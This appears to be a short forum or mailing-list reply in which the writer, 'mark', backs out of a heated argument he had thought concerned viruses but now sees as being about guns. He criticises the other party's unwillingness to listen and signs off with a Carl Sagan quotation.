Really, you should calm down. I'm really not nearly as interested in this as you. I was only pointing out grey area so that you could perhaps realize that such a grey area exists. My conclusion is that you can't see this. Up until now I thought this was at least in some way relating to viruses.
It seems like you wish you could have a good argument about guns, I really can't find another reason. I'm not interested.
I was hoping to get across that no matter what you believe, with an inability to listen, you won't be convincing any new people.
This has been odd.
mark
If you want to make an apple pie from scratch, you must first create the universe. -- Carl Sagan